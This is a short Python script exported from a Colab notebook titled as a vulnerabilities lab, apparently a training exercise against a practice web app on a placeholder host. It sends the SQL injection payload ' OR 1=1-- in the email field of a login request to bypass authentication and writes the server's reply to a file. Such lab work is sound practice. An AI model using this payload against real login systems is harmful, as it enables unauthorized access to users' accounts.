# -*- coding: utf-8 -*-
"""laboratorio-vulnerabilidades.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1s72e16xG94cq_erB5ZZpzrF6qIhAE3rK
"""

!pip install requests

import requests

url = "http://<SEU_IP>:3000/rest/user/login"

payload = {
    "email": "' OR 1=1--",
    "password": "qualquercoisa"
}

response = requests.post(url, json=payload)

print("Status Code:", response.status_code)
print("Resposta (JSON):", response.json())

with open("resultado_sql_injection.txt", "w") as f:
    f.write("Status Code: " + str(response.status_code) + "\n")
    f.write("Resposta:\n" + str(response.text))